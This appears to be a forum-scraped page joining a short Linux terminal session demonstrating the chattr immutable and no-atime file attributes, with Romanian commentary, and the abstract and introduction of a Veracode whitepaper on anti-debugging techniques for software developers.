nytro@rst:/tmp/test$ echo "Plm" > plm nytro@rst:/tmp/test$ ls plm nytro@rst:/tmp/test$ chattr +i plm chattr: Operation not permitted while setting flags on plm nytro@rst:/tmp/test$ su Password: root@rst:/tmp/test# chattr +i plm root@rst:/tmp/test# rm plm rm: cannot remove `plm': Operation not permitted root@rst:/tmp/test# ls -la total 12 drwxr-xr-x 2 nytro nytro 4096 2011-05-20 01:18 . drwxrwxrwt 13 root root 4096 2011-05-20 01:17 .. -rw-r--r-- 1 nytro nytro 4 2011-05-20 01:18 plm root@rst:/tmp/test# lsattr plm ----i------------e- plm root@rst:/tmp/test# chattr +A plm root@rst:/tmp/test# lsattr plm ----i--A---------e- plm root@rst:/tmp/test# cat plm Plm root@rst:/tmp/test# ls -la total 16 drwxr-xr-x 2 nytro nytro 4096 2011-05-20 01:20 . drwxrwxrwt 13 root root 4096 2011-05-20 01:20 .. -rw-r--r-- 1 nytro nytro 4 2011-05-20 01:18 plm root@rst:/tmp/test# touch plm touch: cannot touch `plm': Permission denied root@rst:/tmp/test# Pentru +A, nu se poate modifica data ultimei accesari. Si eu nu am "+XEZ" root@rst:/tmp/test# chattr +Z plm Usage: chattr [-RVf] [-+=AacDdeijsSu] [-v version] files... Dar imi place

AntiDebugging - A developpers view Tyler Shields tshields @ veracode.com Veracode Inc., USA 4 Van de Graaff Drive, Burlington, MA 01803 Abstract Anti-debugging is the implementation of one or more techniques within computer code that hinders attempts at reverse engineering or debugging a target binary. Within this paper we will present a number of the known methods of antidebugging in a fashion that is easy to implement for a developer of moderate expertise. We will include source code, whenever possible, with a line by line explanation of how the antidebugging technique operates. The goal of the paper is to educate development teams on anti-debugging methods and to ease the burden of implementation. Keywords— anti-debugging, security, debugging, copy protection, anti-piracy, reverse engineering. I. INTRODUCTION Anti-debugging, when implemented properly, can be a significant deterrence to would be reverse engineers and software pirates. There is no foolproof solution to thwart the dedicated reverse engineer; however, making the task as arduous and difficult as possible increases the time and expertise required for full analysis of the binary application. Application developers should not be required to spend significant amounts of time understanding and examining the specifics of a software protection scheme. Straight forward implementation of a best of breed solution helps to achieve the aforementioned goals while leaving the developer additional time to implement features and other necessary application components. The majority of data on the topic of anti-debugging has been presented from the vantage point of a reverse engineer. Anti-debugging methods typically have been presented in assembly language dumps with minimal explanation as to the high level code constructs involved in the technique. Unless the developer is adept at reading and comprehending assembly language code, the anti-debugging method is incomprehensible and thus will not be implemented. The goal of this paper is to present a number of antidebugging methods in an easy to comprehend manner. The average developer should be able to read this paper, grasp the concepts described, and readily use the source code provided to implement a myriad of different anti-debugging methods. Education of the developer will lead to a stronger understanding of the basic anti-debugging methods that can be used to limit the effectiveness of a reverse engineer’s primary tool, the debugger. Download: http://www.veracode.com/images/pdf/whitepaper_antidebugging.pdf